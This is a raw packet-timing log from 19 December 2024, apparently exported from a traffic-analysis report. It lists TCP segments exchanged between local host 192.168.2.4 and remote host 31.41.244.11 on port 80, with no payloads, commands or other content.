                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.715351105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.715395927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.715430021 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.715473890 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.716430902 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.716442108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.716479063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.717487097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.717531919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.717674017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.717716932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.718719006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.718729973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.718770027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.719815969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.719826937 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.719876051 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.720760107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.720805883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.720940113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.720984936 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.721856117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.721895933 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.721944094 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.721987963 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.722994089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.723058939 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.723108053 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.724065065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.724119902 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.724153042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.724198103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.725157976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.725219965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.725245953 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.725289106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.726248980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.726290941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.726365089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.726408958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.727349997 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.727400064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.727426052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.727468967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.728389978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.728497982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.728542089 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.729537010 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.729579926 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.729624987 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.729671001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.730603933 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.730690002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.730741978 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.731724977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.731775045 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.731926918 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.731971025 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.732764959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.732811928 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.732881069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.732928991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.734005928 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.734015942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.734056950 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.734966993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.735012054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.735081911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.735127926 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.736032963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.736095905 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.736150980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.736195087 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.737385988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.737396955 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.737442970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.738210917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.738256931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.738425970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.738471031 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.739351988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.739418983 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.739468098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.740345001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.740395069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875169992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875284910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875341892 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875663042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875706911 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875740051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.875782967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.876528025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.876569986 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.876625061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.876666069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.877573013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.877619028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.877643108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.877690077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.878690004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.878859043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.878911018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.879796982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.879865885 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.879961014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.880008936 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.880856991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.880908012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.880959034 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.881004095 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.881953001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.882004023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.882055998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.883039951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.883089066 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.883172035 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.883217096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.884139061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.884187937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.884247065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.884294987 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.885214090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.885260105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.885324001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.885373116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.886307001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.886399984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.886449099 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.887494087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.887542963 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.887600899 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.887648106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.888488054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.888535023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.888596058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.888643026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.889589071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.889637947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.889681101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.889724970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.890666008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.890889883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.890939951 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.891756058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.891801119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.891864061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.891907930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.892858028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.892905951 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.892952919 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.893001080 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.893948078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.893992901 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.894068003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.894280910 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.895030022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.895142078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.895199060 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.896132946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.896179914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.896238089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.896281958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.897200108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.897248030 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.897300005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.897345066 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.898309946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.898420095 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.898483992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.899395943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.899441004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.899497032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.899593115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.900489092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.900557041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.900646925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.900695086 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.901576042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.901622057 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.901741982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.901787043 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.902654886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.902703047 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.902810097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.902854919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.903805017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.903852940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.903908968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.903954029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.904875040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.904922009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.904983044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.905030012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.905949116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.906054974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.906060934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.906104088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.907035112 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.907080889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.907243013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.907288074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.908153057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.908198118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.908267975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.908308029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.909187078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.909254074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.909282923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.909327030 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.910284042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.910398006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.910407066 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.910438061 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.911367893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.911497116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.911550999 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.912489891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.912537098 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.912545919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.912585020 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.913568974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.913619041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.913647890 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.913695097 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.914653063 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.914700031 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.914738894 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.914932013 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.915745974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.915826082 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.915874004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.916816950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.916933060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.916979074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.917969942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.918015003 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.918071985 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.918118954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.918987036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.919034004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.919104099 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.919150114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.920097113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.920144081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.920192957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.920242071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.921185017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.921250105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.921310902 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.921358109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.922271013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.922394991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.922442913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.923381090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.923485041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.923533916 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.924447060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.924493074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.924530983 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.924580097 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.925532103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.925579071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.925627947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.925673008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.926668882 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.926732063 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.926783085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.927715063 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.927761078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.927813053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.927861929 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.928801060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.928848028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.928906918 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.928952932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.929888010 CET804983831.41.244.11192.168.2.4
